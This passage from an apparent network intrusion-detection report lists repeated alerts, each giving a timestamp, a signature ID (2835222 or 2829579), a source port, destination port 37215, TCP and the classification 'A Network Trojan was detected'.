          Timestamp:06/08/24-15:05:29.044202
          SID:2835222
          Source Port:41124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549757
          SID:2835222
          Source Port:44958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160621
          SID:2829579
          Source Port:57894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744580
          SID:2835222
          Source Port:38882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671011
          SID:2835222
          Source Port:56232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897341
          SID:2829579
          Source Port:37946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159053
          SID:2835222
          Source Port:48520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671099
          SID:2829579
          Source Port:46010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.146969
          SID:2835222
          Source Port:60446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467764
          SID:2835222
          Source Port:45546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862255
          SID:2835222
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894951
          SID:2829579
          Source Port:44646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782987
          SID:2835222
          Source Port:35354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160846
          SID:2829579
          Source Port:55600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018374
          SID:2835222
          Source Port:45450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512780
          SID:2829579
          Source Port:46276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020868
          SID:2835222
          Source Port:40944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799357
          SID:2829579
          Source Port:37954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730034
          SID:2829579
          Source Port:55400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456238
          SID:2829579
          Source Port:33046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745760
          SID:2835222
          Source Port:34498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808140
          SID:2835222
          Source Port:44392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884338
          SID:2829579
          Source Port:55934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742422
          SID:2835222
          Source Port:52886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842250
          SID:2829579
          Source Port:57540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407438
          SID:2829579
          Source Port:57272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854702
          SID:2829579
          Source Port:45882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460622
          SID:2835222
          Source Port:38474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160160
          SID:2829579
          Source Port:39818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176273
          SID:2829579
          Source Port:47302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270009
          SID:2835222
          Source Port:45488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911915
          SID:2829579
          Source Port:42848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302366
          SID:2829579
          Source Port:39486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111062
          SID:2835222
          Source Port:55862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884298
          SID:2835222
          Source Port:49796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160533
          SID:2829579
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512506
          SID:2835222
          Source Port:47154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883815
          SID:2829579
          Source Port:43768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895826
          SID:2829579
          Source Port:50434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673102
          SID:2829579
          Source Port:58026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107607
          SID:2829579
          Source Port:34802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257779
          SID:2835222
          Source Port:57406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707254
          SID:2829579
          Source Port:43614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786546
          SID:2835222
          Source Port:56076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706805
          SID:2829579
          Source Port:34526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545923
          SID:2835222
          Source Port:43398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743705
          SID:2835222
          Source Port:39718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513845
          SID:2829579
          Source Port:34442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168456
          SID:2835222
          Source Port:56454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108460
          SID:2835222
          Source Port:56224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730804
          SID:2829579
          Source Port:57870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466471
          SID:2829579
          Source Port:43756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407245
          SID:2835222
          Source Port:37520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546898
          SID:2835222
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241594
          SID:2835222
          Source Port:55762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136015
          SID:2835222
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672640
          SID:2829579
          Source Port:37002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743648
          SID:2835222
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242793
          SID:2835222
          Source Port:45998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554667
          SID:2835222
          Source Port:58716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789846
          SID:2835222
          Source Port:43446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601259
          SID:2829579
          Source Port:60656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704106
          SID:2835222
          Source Port:37178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706119
          SID:2835222
          Source Port:53102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158586
          SID:2829579
          Source Port:51518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822959
          SID:2835222
          Source Port:51274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179961
          SID:2829579
          Source Port:44542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552019
          SID:2835222
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796031
          SID:2835222
          Source Port:35664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861136
          SID:2835222
          Source Port:54300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705385
          SID:2829579
          Source Port:36138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151198
          SID:2835222
          Source Port:60618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553188
          SID:2835222
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731746
          SID:2829579
          Source Port:34542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.472081
          SID:2835222
          Source Port:37616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860846
          SID:2829579
          Source Port:45902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746504
          SID:2829579
          Source Port:59236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730067
          SID:2829579
          Source Port:43006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351903
          SID:2829579
          Source Port:50808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818882
          SID:2829579
          Source Port:60488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160929
          SID:2835222
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021186
          SID:2835222
          Source Port:49838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238499
          SID:2835222
          Source Port:50320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159164
          SID:2829579
          Source Port:41096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176184
          SID:2835222
          Source Port:54714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152681
          SID:2829579
          Source Port:37448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108772
          SID:2829579
          Source Port:39626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109116
          SID:2829579
          Source Port:37950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.144339
          SID:2835222
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.821783
          SID:2835222
          Source Port:55432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448875
          SID:2829579
          Source Port:50518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274397
          SID:2829579
          Source Port:50508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044712
          SID:2835222
          Source Port:53604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078930
          SID:2829579
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134233
          SID:2829579
          Source Port:45676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599765
          SID:2829579
          Source Port:60772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111789
          SID:2835222
          Source Port:47332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299520
          SID:2835222
          Source Port:56210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018921
          SID:2835222
          Source Port:43122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111318
          SID:2835222
          Source Port:53120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257665
          SID:2835222
          Source Port:36244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513303
          SID:2829579
          Source Port:50926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600674
          SID:2835222
          Source Port:43438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444893
          SID:2835222
          Source Port:36842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109885
          SID:2835222
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303083
          SID:2829579
          Source Port:57856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150939
          SID:2835222
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742073
          SID:2835222
          Source Port:39154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734437
          SID:2835222
          Source Port:34394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242357
          SID:2829579
          Source Port:52134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401675
          SID:2835222
          Source Port:35714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185686
          SID:2835222
          Source Port:46854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240713
          SID:2835222
          Source Port:34056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462864
          SID:2829579
          Source Port:46892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395906
          SID:2829579
          Source Port:47802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018665
          SID:2829579
          Source Port:44424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192465
          SID:2835222
          Source Port:47630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099398
          SID:2829579
          Source Port:53268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402044
          SID:2835222
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795209
          SID:2835222
          Source Port:45814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667815
          SID:2829579
          Source Port:41672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854022
          SID:2835222
          Source Port:46960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857244
          SID:2829579
          Source Port:36562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552392
          SID:2829579
          Source Port:36988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853573
          SID:2835222
          Source Port:43896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807036
          SID:2829579
          Source Port:39274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796781
          SID:2829579
          Source Port:56422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855075
          SID:2835222
          Source Port:54418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781699
          SID:2835222
          Source Port:57312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108029
          SID:2835222
          Source Port:60842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242630
          SID:2829579
          Source Port:55416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.159025
          SID:2835222
          Source Port:40082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449500
          SID:2835222
          Source Port:50542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444062
          SID:2829579
          Source Port:52920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705939
          SID:2829579
          Source Port:53942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108032
          SID:2829579
          Source Port:37818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893294
          SID:2829579
          Source Port:37926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159324
          SID:2829579
          Source Port:53094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294850
          SID:2829579
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127168
          SID:2835222
          Source Port:59254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738562
          SID:2829579
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354660
          SID:2829579
          Source Port:51062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175889
          SID:2835222
          Source Port:48804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099330
          SID:2835222
          Source Port:47102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782261
          SID:2829579
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263991
          SID:2829579
          Source Port:33322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403961
          SID:2829579
          Source Port:56200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274347
          SID:2835222
          Source Port:51574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739698
          SID:2829579
          Source Port:37314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135553
          SID:2829579
          Source Port:53966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260994
          SID:2835222
          Source Port:39122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.842929
          SID:2835222
          Source Port:57296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442404
          SID:2835222
          Source Port:46370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395391
          SID:2829579
          Source Port:51294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853098
          SID:2829579
          Source Port:37850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132981
          SID:2829579
          Source Port:55684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449530
          SID:2829579
          Source Port:50336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161166
          SID:2835222
          Source Port:47514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067486
          SID:2829579
          Source Port:44586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554364
          SID:2829579
          Source Port:59862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449332
          SID:2835222
          Source Port:44084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846713
          SID:2835222
          Source Port:55916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160471
          SID:2835222
          Source Port:48640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813204
          SID:2835222
          Source Port:50836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129392
          SID:2835222
          Source Port:55712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269792
          SID:2829579
          Source Port:46570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783230
          SID:2829579
          Source Port:49062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112570
          SID:2835222
          Source Port:42766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354692
          SID:2835222
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179528
          SID:2835222
          Source Port:38330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740694
          SID:2835222
          Source Port:46972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.886962
          SID:2829579
          Source Port:34722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739277
          SID:2829579
          Source Port:43580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150395
          SID:2835222
          Source Port:58550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243429
          SID:2829579
          Source Port:57620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449513
          SID:2835222
          Source Port:47104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040171
          SID:2835222
          Source Port:43700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704425
          SID:2835222
          Source Port:33438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303106
          SID:2829579
          Source Port:41560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150327
          SID:2835222
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548847
          SID:2829579
          Source Port:47590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704315
          SID:2829579
          Source Port:48978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796468
          SID:2829579
          Source Port:50532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109282
          SID:2835222
          Source Port:36068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731538
          SID:2829579
          Source Port:57512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599870
          SID:2835222
          Source Port:47904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058259
          SID:2829579
          Source Port:59754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016019
          SID:2835222
          Source Port:35376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782631
          SID:2835222
          Source Port:54868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737023
          SID:2835222
          Source Port:58986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152986
          SID:2835222
          Source Port:43496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816920
          SID:2835222
          Source Port:55670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896697
          SID:2829579
          Source Port:48842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174220
          SID:2835222
          Source Port:57250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081209
          SID:2829579
          Source Port:52352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782328
          SID:2835222
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170711
          SID:2829579
          Source Port:45578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732757
